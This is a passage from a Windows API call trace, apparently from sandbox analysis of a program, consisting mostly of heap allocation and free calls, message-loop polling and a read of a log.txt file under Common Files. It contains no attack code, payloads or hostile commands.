dwFlags=0x0, lpMem=0xdf4518 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52830 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4500 | out: hHeap=0xbe0000) returned 1 [0248.378] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4500 [0248.378] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4518 [0248.378] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4530 [0248.378] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52830 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4530 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52830 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4518 | out: hHeap=0xbe0000) returned 1 [0248.378] FreeLibrary (hLibModule=0x76e00000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527e0 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527f0 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52800 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52810 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d6c0 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4488 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf42f0 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf42d8 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4320 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4308 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4350 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4338 | out: hHeap=0xbe0000) returned 1 [0248.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4380 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4368 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4398 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf43c8 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf43b0 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf43e0 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4410 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf43f8 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4428 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4458 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4440 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4470 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe016a0 | out: hHeap=0xbe0000) returned 1 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527b0 | out: hHeap=0xbe0000) returned 1 [0248.379] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 1 [0248.379] TranslateMessage (lpMsg=0x8bf454) returned 0 [0248.379] DispatchMessageW (lpMsg=0x8bf454) returned 0xffffffff [0248.379] GetForegroundWindow () returned 0x10058 [0248.379] GetWindowLongW (hWnd=0x10058, nIndex=-21) returned 0 [0248.379] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0248.379] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527b0 [0248.379] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe638d8 [0248.379] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527c0 [0248.379] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe638d8 | out: hHeap=0xbe0000) returned 1 [0248.380] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.380] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527b0 | out: hHeap=0xbe0000) returned 1 [0248.380] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527b0 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40af0 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52810 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40b10 [0248.380] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52810 | out: hHeap=0xbe0000) returned 1 [0248.380] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40b10 | out: hHeap=0xbe0000) returned 1 [0248.380] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.380] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.380] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527b0 | out: hHeap=0xbe0000) returned 1 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d6c0 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4470 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4440 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4458 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4428 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf43f8 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4410 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf43e0 [0248.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf43b0 [0248.381] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527b0 [0248.381] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527c0 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527c0 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527b0 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4470 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4458 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4440 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4428 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4410 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf43f8 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf43e0 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf43b0 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d6c0 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01658 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf40f8 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4110 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d4e0 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44b8 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44a0 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44d0 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf44e8 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4500 | out: hHeap=0xbe0000) returned 1 [0248.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd01010 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe636b8 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf42c0 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf42a8 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527a0 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d698 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf40b0 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf40e0 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52730 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d508 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4290 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4278 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d670 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52790 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d648 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4230 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4218 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5d0 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52770 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5a8 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4188 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf40c8 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52740 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d530 | out: hHeap=0xbe0000) returned 1 [0248.382] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4260 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4248 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d620 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52780 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5f8 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41b8 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41a0 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d558 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41e8 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41d0 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52760 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d580 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4200 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526f0 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52700 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d490 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4170 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4158 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4128 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d4b8 | out: hHeap=0xbe0000) returned 1 [0248.383] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01610 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4068 | out: hHeap=0xbe0000) returned 1 [0248.383] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526d0 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d440 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4098 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4080 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526e0 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d468 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3de0 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526c0 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d3f0 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3df8 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e28 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d418 | out: hHeap=0xbe0000) returned 1 [0248.384] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.384] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d418 [0248.384] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3e28 [0248.384] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526c0 [0248.384] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52660 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526c0 | out: hHeap=0xbe0000) returned 1 [0248.384] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3df8 [0248.384] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526c0 [0248.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526c0 | out: hHeap=0xbe0000) returned 1 [0248.384] CreateSolidBrush (color=0x0) returned 0x241001d8 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf3de0 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4080 [0248.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e28 | out: hHeap=0xbe0000) returned 1 [0248.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3df8 | out: hHeap=0xbe0000) returned 1 [0248.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d418 | out: hHeap=0xbe0000) returned 1 [0248.385] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d418 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3df8 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526c0 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52660 [0248.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526c0 | out: hHeap=0xbe0000) returned 1 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3e28 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526c0 [0248.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526c0 | out: hHeap=0xbe0000) returned 1 [0248.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3df8 | out: hHeap=0xbe0000) returned 1 [0248.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e28 | out: hHeap=0xbe0000) returned 1 [0248.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d418 | out: hHeap=0xbe0000) returned 1 [0248.385] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526c0 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d418 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3e28 [0248.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52660 [0248.386] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3df8 [0248.386] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526e0 [0248.386] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xd01010 [0248.386] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4098 [0248.386] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526d0 [0248.386] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01610 [0248.386] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4098 | out: hHeap=0xbe0000) returned 1 [0248.386] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd01010 | out: hHeap=0xbe0000) returned 1 [0248.386] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526e0 | out: hHeap=0xbe0000) returned 1 [0248.386] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52660 | out: hHeap=0xbe0000) returned 1 [0248.386] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4098 [0248.386] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.386] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52660 [0248.386] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe33dd0 [0248.386] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10000) returned 0xe6abc0 [0248.387] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4068 [0248.387] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526e0 [0248.387] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5fc [0248.387] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.387] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4dc | out: lpNewFilePointer=0x0) returned 1 [0248.387] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52710 [0248.387] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10000) returned 0xe7abc8 [0248.388] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52700 [0248.388] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.388] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0248.388] ReadFile (in: hFile=0x5fc, lpBuffer=0xe6abc0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf514, lpOverlapped=0x0 | out: lpBuffer=0xe6abc0*, lpNumberOfBytesRead=0x8bf514*=0x4011, lpOverlapped=0x0) returned 1 [0248.390] ReadFile (in: hFile=0x5fc, lpBuffer=0xe6abc0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf514, lpOverlapped=0x0 | out: lpBuffer=0xe6abc0*, lpNumberOfBytesRead=0x8bf514*=0x0, lpOverlapped=0x0) returned 1 [0248.390] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52700 | out: hHeap=0xbe0000) returned 1 [0248.390] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe7abc8 | out: hHeap=0xbe0000) returned 1 [0248.390] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.390] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf510 | out: lpNewFilePointer=0x0) returned 1 [0248.390] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.390] SetFilePointerEx (in: hFile=0x5fc, 